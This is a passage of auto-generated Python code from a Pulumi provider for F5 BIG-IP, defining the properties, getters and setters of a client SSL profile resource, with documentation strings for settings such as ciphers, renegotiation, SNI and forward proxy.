:param pulumi.Input[str] proxy_ssl_passthrough: Proxy SSL passthrough enabled / disabled. Default is disabled.
:param pulumi.Input[str] renegotiate_period: Renogotiate Period (seconds)
:param pulumi.Input[str] renegotiate_size: Renogotiate Size
:param pulumi.Input[str] renegotiation: Enables or disables SSL renegotiation.When creating a new profile, the setting is provided by the parent profile
:param pulumi.Input[str] retain_certificate: When `true`, client certificate is retained in SSL session.
:param pulumi.Input[str] secure_renegotiation: Specifies the method of secure renegotiations for SSL connections. When creating a new profile, the setting is provided by the parent profile.
When `request` is set the system request secure renegotation of SSL connections.
`require` is a default setting and when set the system permits initial SSL handshakes from clients but terminates renegotiations from unpatched clients.
The `require-strict` setting the system requires strict renegotiation of SSL connections. In this mode the system refuses connections to insecure servers, and terminates existing SSL connections to insecure servers
:param pulumi.Input[str] server_name: Specifies the fully qualified DNS hostname of the server used in Server Name Indication communications. When creating a new profile, the setting is provided by the parent profile.The server name can also be a wildcard string containing the asterisk `*` character.
:param pulumi.Input[str] session_mirroring: Session Mirroring (enabled / disabled)
:param pulumi.Input[str] session_ticket: Session Ticket (enabled / disabled)
:param pulumi.Input[str] sni_default: Indicates that the system uses this profile as the default SSL profile when there is no match to the server name, or when the client provides no SNI extension support.When creating a new profile, the setting is provided by the parent profile.
There can be only one SSL profile with this setting enabled.
:param pulumi.Input[str] sni_require: Requires that the network peers also provide SNI support, this setting only takes effect when `sni_default` is set to `true`.When creating a new profile, the setting is provided by the parent profile
:param pulumi.Input[str] ssl_c3d: Enables or disables SSL client certificate constrained delegation. The default option is disabled. Conversely, you can specify enabled to use the SSL client certificate constrained delegation.
:param pulumi.Input[str] ssl_forward_proxy: Specifies whether SSL forward proxy feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_forward_proxy_bypass: Specifies whether SSL forward proxy bypass feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_sign_hash: SSL sign hash (any, sha1, sha256, sha384)
:param pulumi.Input[str] strict_resume: Enables or disables the resumption of SSL sessions after an unclean shutdown.When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tm_options: List of Enabled selection from a set of industry standard options for handling SSL processing.By default,
Don't insert empty fragments and No TLSv1.3 are listed as Enabled Options. `Usage` : tm_options = ["dont-insert-empty-fragments","no-tlsv1.3"]
:param pulumi.Input[str] unclean_shutdown: Unclean Shutdown (enabled / disabled)
"""
pulumi.set(__self__, "name", name)
if alert_timeout is not None:
pulumi.set(__self__, "alert_timeout", alert_timeout)
if allow_non_ssl is not None:
pulumi.set(__self__, "allow_non_ssl", allow_non_ssl)
if authenticate is not None:
pulumi.set(__self__, "authenticate", authenticate)
if authenticate_depth is not None:
pulumi.set(__self__, "authenticate_depth", authenticate_depth)
if c3d_client_fallback_cert is not None:
pulumi.set(__self__, "c3d_client_fallback_cert", c3d_client_fallback_cert)
if c3d_drop_unknown_ocsp_status is not None:
pulumi.set(__self__, "c3d_drop_unknown_ocsp_status", c3d_drop_unknown_ocsp_status)
if c3d_ocsp is not None:
pulumi.set(__self__, "c3d_ocsp", c3d_ocsp)
if ca_file is not None:
pulumi.set(__self__, "ca_file", ca_file)
if cache_size is not None:
pulumi.set(__self__, "cache_size", cache_size)
if cache_timeout is not None:
pulumi.set(__self__, "cache_timeout", cache_timeout)
if cert is not None:
pulumi.set(__self__, "cert", cert)
if cert_extension_includes is not None:
pulumi.set(__self__, "cert_extension_includes", cert_extension_includes)
if cert_key_chains is not None:
pulumi.set(__self__, "cert_key_chains", cert_key_chains)
if cert_life_span is not None:
pulumi.set(__self__, "cert_life_span", cert_life_span)
if cert_lookup_by_ipaddr_port is not None:
pulumi.set(__self__, "cert_lookup_by_ipaddr_port", cert_lookup_by_ipaddr_port)
if chain is not None:
pulumi.set(__self__, "chain", chain)
if ciphers is not None:
pulumi.set(__self__, "ciphers", ciphers)
if client_cert_ca is not None:
pulumi.set(__self__, "client_cert_ca", client_cert_ca)
if crl_file is not None:
pulumi.set(__self__, "crl_file", crl_file)
if defaults_from is not None:
pulumi.set(__self__, "defaults_from", defaults_from)
if forward_proxy_bypass_default_action is not None:
pulumi.set(__self__, "forward_proxy_bypass_default_action", forward_proxy_bypass_default_action)
if full_path is not None:
pulumi.set(__self__, "full_path", full_path)
if generation is not None:
pulumi.set(__self__, "generation", generation)
if generic_alert is not None:
pulumi.set(__self__, "generic_alert", generic_alert)
if handshake_timeout is not None:
pulumi.set(__self__, "handshake_timeout", handshake_timeout)
if inherit_cert_keychain is not None:
pulumi.set(__self__, "inherit_cert_keychain", inherit_cert_keychain)
if key is not None:
pulumi.set(__self__, "key", key)
if mod_ssl_methods is not None:
pulumi.set(__self__, "mod_ssl_methods", mod_ssl_methods)
if mode is not None:
pulumi.set(__self__, "mode", mode)
if partition is not None:
pulumi.set(__self__, "partition", partition)
if passphrase is not None:
pulumi.set(__self__, "passphrase", passphrase)
if peer_cert_mode is not None:
pulumi.set(__self__, "peer_cert_mode", peer_cert_mode)
if proxy_ca_cert is not None:
pulumi.set(__self__, "proxy_ca_cert", proxy_ca_cert)
if proxy_ca_key is not None:
pulumi.set(__self__, "proxy_ca_key", proxy_ca_key)
if proxy_ca_passphrase is not None:
pulumi.set(__self__, "proxy_ca_passphrase", proxy_ca_passphrase)
if proxy_ssl is not None:
pulumi.set(__self__, "proxy_ssl", proxy_ssl)
if proxy_ssl_passthrough is not None:
pulumi.set(__self__, "proxy_ssl_passthrough", proxy_ssl_passthrough)
if renegotiate_period is not None:
pulumi.set(__self__, "renegotiate_period", renegotiate_period)
if renegotiate_size is not None:
pulumi.set(__self__, "renegotiate_size", renegotiate_size)
if renegotiation is not None:
pulumi.set(__self__, "renegotiation", renegotiation)
if retain_certificate is not None:
pulumi.set(__self__, "retain_certificate", retain_certificate)
if secure_renegotiation is not None:
pulumi.set(__self__, "secure_renegotiation", secure_renegotiation)
if server_name is not None:
pulumi.set(__self__, "server_name", server_name)
if session_mirroring is not None:
pulumi.set(__self__, "session_mirroring", session_mirroring)
if session_ticket is not None:
pulumi.set(__self__, "session_ticket", session_ticket)
if sni_default is not None:
pulumi.set(__self__, "sni_default", sni_default)
if sni_require is not None:
pulumi.set(__self__, "sni_require", sni_require)
if ssl_c3d is not None:
pulumi.set(__self__, "ssl_c3d", ssl_c3d)
if ssl_forward_proxy is not None:
pulumi.set(__self__, "ssl_forward_proxy", ssl_forward_proxy)
if ssl_forward_proxy_bypass is not None:
pulumi.set(__self__, "ssl_forward_proxy_bypass", ssl_forward_proxy_bypass)
if ssl_sign_hash is not None:
pulumi.set(__self__, "ssl_sign_hash", ssl_sign_hash)
if strict_resume is not None:
pulumi.set(__self__, "strict_resume", strict_resume)
if tm_options is not None:
pulumi.set(__self__, "tm_options", tm_options)
if unclean_shutdown is not None:
pulumi.set(__self__, "unclean_shutdown", unclean_shutdown)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Specifies the name of the profile.Name of Profile should be full path.The full path is the combination of the `partition + profile name`,For example `/Common/test-clientssl-profile`.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="alertTimeout")
def alert_timeout(self) -> Optional[pulumi.Input[str]]:
"""
Alert time out
"""
return pulumi.get(self, "alert_timeout")
@alert_timeout.setter
def alert_timeout(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "alert_timeout", value)
@property
@pulumi.getter(name="allowNonSsl")
def allow_non_ssl(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables acceptance of non-SSL connections, When creating a new profile, the setting is provided by the parent profile
"""
return pulumi.get(self, "allow_non_ssl")
@allow_non_ssl.setter
def allow_non_ssl(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "allow_non_ssl", value)
@property
@pulumi.getter
def authenticate(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the frequency of client authentication for an SSL session.When `once`,specifies that the system authenticates the client once for an SSL session.
When `always`, specifies that the system authenticates the client once for an SSL session and also upon reuse of that session.
"""
return pulumi.get(self, "authenticate")
@authenticate.setter
def authenticate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authenticate", value)
@property
@pulumi.getter(name="authenticateDepth")
def authenticate_depth(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the maximum number of certificates to be traversed in a client certificate chain
"""
return pulumi.get(self, "authenticate_depth")
@authenticate_depth.setter
def authenticate_depth(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "authenticate_depth", value)
@property
@pulumi.getter(name="c3dClientFallbackCert")
def c3d_client_fallback_cert(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the client certificate to use in SSL client certificate constrained delegation. This certificate will be used if client does not provide a cert during the SSL handshake. The default value is none.
"""
return pulumi.get(self, "c3d_client_fallback_cert")
@c3d_client_fallback_cert.setter
def c3d_client_fallback_cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "c3d_client_fallback_cert", value)
@property
@pulumi.getter(name="c3dDropUnknownOcspStatus")
def c3d_drop_unknown_ocsp_status(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the BIG-IP action when the OCSP responder returns unknown status. The default value is drop, which causes the onnection to be dropped. Conversely, you can specify ignore, which causes the connection to ignore the unknown status and continue.
"""
return pulumi.get(self, "c3d_drop_unknown_ocsp_status")
@c3d_drop_unknown_ocsp_status.setter
def c3d_drop_unknown_ocsp_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "c3d_drop_unknown_ocsp_status", value)
@property
@pulumi.getter(name="c3dOcsp")
def c3d_ocsp(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the SSL client certificate constrained delegation OCSP object that the BIG-IP SSL should use to connect to the OCSP responder and check the client certificate status.
"""
return pulumi.get(self, "c3d_ocsp")
@c3d_ocsp.setter
def c3d_ocsp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "c3d_ocsp", value)
@property
@pulumi.getter(name="caFile")
def ca_file(self) -> Optional[pulumi.Input[str]]:
"""
Client certificate file path. Default None.
"""
return pulumi.get(self, "ca_file")
@ca_file.setter
def ca_file(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ca_file", value)
@property
@pulumi.getter(name="cacheSize")
def cache_size(self) -> Optional[pulumi.Input[int]]:
"""
Cache size (sessions).
"""
return pulumi.get(self, "cache_size")
@cache_size.setter
def cache_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cache_size", value)
@property
@pulumi.getter(name="cacheTimeout")
def cache_timeout(self) -> Optional[pulumi.Input[int]]:
"""
Cache time out
"""
return pulumi.get(self, "cache_timeout")
@cache_timeout.setter
def cache_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cache_timeout", value)
@property
@pulumi.getter
def cert(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a cert name for use.
"""
return pulumi.get(self, "cert")
@cert.setter
def cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cert", value)
@property
@pulumi.getter(name="certExtensionIncludes")
def cert_extension_includes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Cert extension includes for ssl forward proxy
"""
return pulumi.get(self, "cert_extension_includes")
@cert_extension_includes.setter
def cert_extension_includes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "cert_extension_includes", value)
@property
@pulumi.getter(name="certKeyChains")
def cert_key_chains(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ProfileClientSslCertKeyChainArgs']]]]:
return pulumi.get(self, "cert_key_chains")
@cert_key_chains.setter
def cert_key_chains(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ProfileClientSslCertKeyChainArgs']]]]):
pulumi.set(self, "cert_key_chains", value)
@property
@pulumi.getter(name="certLifeSpan")
def cert_life_span(self) -> Optional[pulumi.Input[int]]:
"""
Life span of the certificate in days for ssl forward proxy
"""
return pulumi.get(self, "cert_life_span")
@cert_life_span.setter
def cert_life_span(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cert_life_span", value)
@property
@pulumi.getter(name="certLookupByIpaddrPort")
def cert_lookup_by_ipaddr_port(self) -> Optional[pulumi.Input[str]]:
"""
Cert lookup by ip address and port enabled / disabled
"""
return pulumi.get(self, "cert_lookup_by_ipaddr_port")
@cert_lookup_by_ipaddr_port.setter
def cert_lookup_by_ipaddr_port(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cert_lookup_by_ipaddr_port", value)
@property
@pulumi.getter
def chain(self) -> Optional[pulumi.Input[str]]:
"""
Contains a certificate chain that is relevant to the certificate and key mentioned earlier.This key is optional
"""
return pulumi.get(self, "chain")
@chain.setter
def chain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "chain", value)
@property
@pulumi.getter
def ciphers(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the list of ciphers that the system supports. When creating a new profile, the default cipher list is provided by the parent profile.
"""
return pulumi.get(self, "ciphers")
@ciphers.setter
def ciphers(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ciphers", value)
@property
@pulumi.getter(name="clientCertCa")
def client_cert_ca(self) -> Optional[pulumi.Input[str]]:
"""
client certificate name
"""
return pulumi.get(self, "client_cert_ca")
@client_cert_ca.setter
def client_cert_ca(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_cert_ca", value)
@property
@pulumi.getter(name="crlFile")
def crl_file(self) -> Optional[pulumi.Input[str]]:
"""
Certificate revocation file name
"""
return pulumi.get(self, "crl_file")
@crl_file.setter
def crl_file(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "crl_file", value)
@property
@pulumi.getter(name="defaultsFrom")
def defaults_from(self) -> Optional[pulumi.Input[str]]:
"""
Parent profile for this clientssl profile.Once this value has been set, it cannot be changed. Default value is `/Common/clientssl`. It Should Full path `/partition/profile_name`
"""
return pulumi.get(self, "defaults_from")
@defaults_from.setter
def defaults_from(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "defaults_from", value)
@property
@pulumi.getter(name="forwardProxyBypassDefaultAction")
def forward_proxy_bypass_default_action(self) -> Optional[pulumi.Input[str]]:
"""
Forward proxy bypass default action. (enabled / disabled)
"""
return pulumi.get(self, "forward_proxy_bypass_default_action")
@forward_proxy_bypass_default_action.setter
def forward_proxy_bypass_default_action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "forward_proxy_bypass_default_action", value)
@property
@pulumi.getter(name="fullPath")
def full_path(self) -> Optional[pulumi.Input[str]]:
"""
full path of the profile
"""
return pulumi.get(self, "full_path")
@full_path.setter
def full_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "full_path", value)
@property
@pulumi.getter
def generation(self) -> Optional[pulumi.Input[int]]:
"""
generation
"""
return pulumi.get(self, "generation")
@generation.setter
def generation(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "generation", value)
@property
@pulumi.getter(name="genericAlert")
def generic_alert(self) -> Optional[pulumi.Input[str]]:
"""
Generic alerts enabled / disabled.
"""
return pulumi.get(self, "generic_alert")
@generic_alert.setter
def generic_alert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "generic_alert", value)
@property
@pulumi.getter(name="handshakeTimeout")
def handshake_timeout(self) -> Optional[pulumi.Input[str]]:
"""
Handshake time out (seconds)
"""
return pulumi.get(self, "handshake_timeout")
@handshake_timeout.setter
def handshake_timeout(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "handshake_timeout", value)
@property
@pulumi.getter(name="inheritCertKeychain")
def inherit_cert_keychain(self) -> Optional[pulumi.Input[str]]:
"""
Inherit cert key chain
"""
return pulumi.get(self, "inherit_cert_keychain")
@inherit_cert_keychain.setter
def inherit_cert_keychain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "inherit_cert_keychain", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
Contains a key name
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="modSslMethods")
def mod_ssl_methods(self) -> Optional[pulumi.Input[str]]:
"""
ModSSL Methods enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "mod_ssl_methods")
@mod_ssl_methods.setter
def mod_ssl_methods(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mod_ssl_methods", value)
@property
@pulumi.getter
def mode(self) -> Optional[pulumi.Input[str]]:
"""
ModSSL Methods enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "mode")
@mode.setter
def mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mode", value)
@property
@pulumi.getter
def partition(self) -> Optional[pulumi.Input[str]]:
"""
name of partition
"""
return pulumi.get(self, "partition")
@partition.setter
def partition(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partition", value)
@property
@pulumi.getter
def passphrase(self) -> Optional[pulumi.Input[str]]:
"""
Client Certificate Constrained Delegation CA passphrase
"""
return pulumi.get(self, "passphrase")
@passphrase.setter
def passphrase(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "passphrase", value)
@property
@pulumi.getter(name="peerCertMode")
def peer_cert_mode(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the way the system handles client certificates.When ignore, specifies that the system ignores certificates from client systems.When require, specifies that the system requires a client to present a valid certificate.When request, specifies that the system requests a valid certificate from a client but always authenticate the client.
"""
return pulumi.get(self, "peer_cert_mode")
@peer_cert_mode.setter
def peer_cert_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "peer_cert_mode", value)
@property
@pulumi.getter(name="proxyCaCert")
def proxy_ca_cert(self) -> Optional[pulumi.Input[str]]:
"""
Proxy CA Cert
"""
return pulumi.get(self, "proxy_ca_cert")
@proxy_ca_cert.setter
def proxy_ca_cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ca_cert", value)
@property
@pulumi.getter(name="proxyCaKey")
def proxy_ca_key(self) -> Optional[pulumi.Input[str]]:
"""
Proxy CA Key
"""
return pulumi.get(self, "proxy_ca_key")
@proxy_ca_key.setter
def proxy_ca_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ca_key", value)
@property
@pulumi.getter(name="proxyCaPassphrase")
def proxy_ca_passphrase(self) -> Optional[pulumi.Input[str]]:
"""
Proxy CA Passphrase
"""
return pulumi.get(self, "proxy_ca_passphrase")
@proxy_ca_passphrase.setter
def proxy_ca_passphrase(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ca_passphrase", value)
@property
@pulumi.getter(name="proxySsl")
def proxy_ssl(self) -> Optional[pulumi.Input[str]]:
"""
Proxy SSL enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "proxy_ssl")
@proxy_ssl.setter
def proxy_ssl(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ssl", value)
@property
@pulumi.getter(name="proxySslPassthrough")
def proxy_ssl_passthrough(self) -> Optional[pulumi.Input[str]]:
"""
Proxy SSL passthrough enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "proxy_ssl_passthrough")
@proxy_ssl_passthrough.setter
def proxy_ssl_passthrough(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ssl_passthrough", value)
@property
@pulumi.getter(name="renegotiatePeriod")
def renegotiate_period(self) -> Optional[pulumi.Input[str]]:
"""
Renogotiate Period (seconds)
"""
return pulumi.get(self, "renegotiate_period")
@renegotiate_period.setter
def renegotiate_period(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "renegotiate_period", value)
@property
@pulumi.getter(name="renegotiateSize")
def renegotiate_size(self) -> Optional[pulumi.Input[str]]:
"""
Renogotiate Size
"""
return pulumi.get(self, "renegotiate_size")
@renegotiate_size.setter
def renegotiate_size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "renegotiate_size", value)
@property
@pulumi.getter
def renegotiation(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables SSL renegotiation.When creating a new profile, the setting is provided by the parent profile
"""
return pulumi.get(self, "renegotiation")
@renegotiation.setter
def renegotiation(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "renegotiation", value)
@property
@pulumi.getter(name="retainCertificate")
def retain_certificate(self) -> Optional[pulumi.Input[str]]:
"""
When `true`, client certificate is retained in SSL session.
"""
return pulumi.get(self, "retain_certificate")
@retain_certificate.setter
def retain_certificate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "retain_certificate", value)
@property
@pulumi.getter(name="secureRenegotiation")
def secure_renegotiation(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the method of secure renegotiations for SSL connections. When creating a new profile, the setting is provided by the parent profile.
When `request` is set the system request secure renegotation of SSL connections.
`require` is a default setting and when set the system permits initial SSL handshakes from clients but terminates renegotiations from unpatched clients.
The `require-strict` setting the system requires strict renegotiation of SSL connections. In this mode the system refuses connections to insecure servers, and terminates existing SSL connections to insecure servers
"""
return pulumi.get(self, "secure_renegotiation")
@secure_renegotiation.setter
def secure_renegotiation(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secure_renegotiation", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the fully qualified DNS hostname of the server used in Server Name Indication communications. When creating a new profile, the setting is provided by the parent profile.The server name can also be a wildcard string containing the asterisk `*` character.
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter(name="sessionMirroring")
def session_mirroring(self) -> Optional[pulumi.Input[str]]:
"""
Session Mirroring (enabled / disabled)
"""
return pulumi.get(self, "session_mirroring")
@session_mirroring.setter
def session_mirroring(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "session_mirroring", value)
@property
@pulumi.getter(name="sessionTicket")
def session_ticket(self) -> Optional[pulumi.Input[str]]:
"""
Session Ticket (enabled / disabled)
"""
return pulumi.get(self, "session_ticket")
@session_ticket.setter
def session_ticket(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "session_ticket", value)
@property
@pulumi.getter(name="sniDefault")
def sni_default(self) -> Optional[pulumi.Input[str]]:
"""
Indicates that the system uses this profile as the default SSL profile when there is no match to the server name, or when the client provides no SNI extension support.When creating a new profile, the setting is provided by the parent profile.
There can be only one SSL profile with this setting enabled.
"""
return pulumi.get(self, "sni_default")
@sni_default.setter
def sni_default(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sni_default", value)
@property
@pulumi.getter(name="sniRequire")
def sni_require(self) -> Optional[pulumi.Input[str]]:
"""
Requires that the network peers also provide SNI support, this setting only takes effect when `sni_default` is set to `true`.When creating a new profile, the setting is provided by the parent profile
"""
return pulumi.get(self, "sni_require")
@sni_require.setter
def sni_require(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sni_require", value)
@property
@pulumi.getter(name="sslC3d")
def ssl_c3d(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables SSL client certificate constrained delegation. The default option is disabled. Conversely, you can specify enabled to use the SSL client certificate constrained delegation.
"""
return pulumi.get(self, "ssl_c3d")
@ssl_c3d.setter
def ssl_c3d(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_c3d", value)
@property
@pulumi.getter(name="sslForwardProxy")
def ssl_forward_proxy(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether SSL forward proxy feature is enabled or not. The default value is disabled.
"""
return pulumi.get(self, "ssl_forward_proxy")
@ssl_forward_proxy.setter
def ssl_forward_proxy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_forward_proxy", value)
@property
@pulumi.getter(name="sslForwardProxyBypass")
def ssl_forward_proxy_bypass(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether SSL forward proxy bypass feature is enabled or not. The default value is disabled.
"""
return pulumi.get(self, "ssl_forward_proxy_bypass")
@ssl_forward_proxy_bypass.setter
def ssl_forward_proxy_bypass(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_forward_proxy_bypass", value)
@property
@pulumi.getter(name="sslSignHash")
def ssl_sign_hash(self) -> Optional[pulumi.Input[str]]:
"""
SSL sign hash (any, sha1, sha256, sha384)
"""
return pulumi.get(self, "ssl_sign_hash")
@ssl_sign_hash.setter
def ssl_sign_hash(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_sign_hash", value)
@property
@pulumi.getter(name="strictResume")
def strict_resume(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables the resumption of SSL sessions after an unclean shutdown.When creating a new profile, the setting is provided by the parent profile.
"""
return pulumi.get(self, "strict_resume")
@strict_resume.setter
def strict_resume(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "strict_resume", value)
@property
@pulumi.getter(name="tmOptions")
def tm_options(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of Enabled selection from a set of industry standard options for handling SSL processing.By default,
Don't insert empty fragments and No TLSv1.3 are listed as Enabled Options. `Usage` : tm_options = ["dont-insert-empty-fragments","no-tlsv1.3"]
"""
return pulumi.get(self, "tm_options")
@tm_options.setter
def tm_options(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tm_options", value)
@property
@pulumi.getter(name="uncleanShutdown")
def unclean_shutdown(self) -> Optional[pulumi.Input[str]]:
"""
Unclean Shutdown (enabled / disabled)
"""
return pulumi.get(self, "unclean_shutdown")
@unclean_shutdown.setter
def unclean_shutdown(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "unclean_shutdown", value)
@pulumi.input_type
class _ProfileClientSslState:
def __init__(__self__, *,
alert_timeout: Optional[pulumi.Input[str]] = None,
allow_non_ssl: Optional[pulumi.Input[str]] = None,
authenticate: Optional[pulumi.Input[str]] = None,
authenticate_depth: Optional[pulumi.Input[int]] = None,
c3d_client_fallback_cert: Optional[pulumi.Input[str]] = None,
c3d_drop_unknown_ocsp_status: Optional[pulumi.Input[str]] = None,
c3d_ocsp: Optional[pulumi.Input[str]] = None,
ca_file: Optional[pulumi.Input[str]] = None,
cache_size: Optional[pulumi.Input[int]] = None,
cache_timeout: Optional[pulumi.Input[int]] = None,
cert: Optional[pulumi.Input[str]] = None,
cert_extension_includes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cert_key_chains: Optional[pulumi.Input[Sequence[pulumi.Input['ProfileClientSslCertKeyChainArgs']]]] = None,
cert_life_span: Optional[pulumi.Input[int]] = None,
cert_lookup_by_ipaddr_port: Optional[pulumi.Input[str]] = None,
chain: Optional[pulumi.Input[str]] = None,
ciphers: Optional[pulumi.Input[str]] = None,
client_cert_ca: Optional[pulumi.Input[str]] = None,
crl_file: Optional[pulumi.Input[str]] = None,
defaults_from: Optional[pulumi.Input[str]] = None,
forward_proxy_bypass_default_action: Optional[pulumi.Input[str]] = None,
full_path: Optional[pulumi.Input[str]] = None,
generation: Optional[pulumi.Input[int]] = None,
generic_alert: Optional[pulumi.Input[str]] = None,
handshake_timeout: Optional[pulumi.Input[str]] = None,
inherit_cert_keychain: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
mod_ssl_methods: Optional[pulumi.Input[str]] = None,
mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
partition: Optional[pulumi.Input[str]] = None,
passphrase: Optional[pulumi.Input[str]] = None,
peer_cert_mode: Optional[pulumi.Input[str]] = None,
proxy_ca_cert: Optional[pulumi.Input[str]] = None,
proxy_ca_key: Optional[pulumi.Input[str]] = None,
proxy_ca_passphrase: Optional[pulumi.Input[str]] = None,
proxy_ssl: Optional[pulumi.Input[str]] = None,
proxy_ssl_passthrough: Optional[pulumi.Input[str]] = None,
renegotiate_period: Optional[pulumi.Input[str]] = None,
renegotiate_size: Optional[pulumi.Input[str]] = None,
renegotiation: Optional[pulumi.Input[str]] = None,
retain_certificate: Optional[pulumi.Input[str]] = None,
secure_renegotiation: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
session_mirroring: Optional[pulumi.Input[str]] = None,
session_ticket: Optional[pulumi.Input[str]] = None,
sni_default: Optional[pulumi.Input[str]] = None,
sni_require: Optional[pulumi.Input[str]] = None,
ssl_c3d: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy_bypass: Optional[pulumi.Input[str]] = None,
ssl_sign_hash: Optional[pulumi.Input[str]] = None,
strict_resume: Optional[pulumi.Input[str]] = None,
tm_options: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
unclean_shutdown: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ProfileClientSsl resources.
:param pulumi.Input[str] alert_timeout: Alert time out
:param pulumi.Input[str] allow_non_ssl: Enables or disables acceptance of non-SSL connections, When creating a new profile, the setting is provided by the parent profile
:param pulumi.Input[str] authenticate: Specifies the frequency of client authentication for an SSL session.When `once`,specifies that the system authenticates the client once for an SSL session.
When `always`, specifies that the system authenticates the client once for an SSL session and also upon reuse of that session.
:param pulumi.Input[int] authenticate_depth: Specifies the maximum number of certificates to be traversed in a client certificate chain
:param pulumi.Input[str] c3d_client_fallback_cert: Specifies the client certificate to use in SSL client certificate constrained delegation. This certificate will be used if client does not provide a cert during the SSL handshake. The default value is none.
:param pulumi.Input[str] c3d_drop_unknown_ocsp_status: Specifies the BIG-IP action when the OCSP responder returns unknown status. The default value is drop, which causes the onnection to be dropped. Conversely, you can specify ignore, which causes the connection to ignore the unknown status and continue.
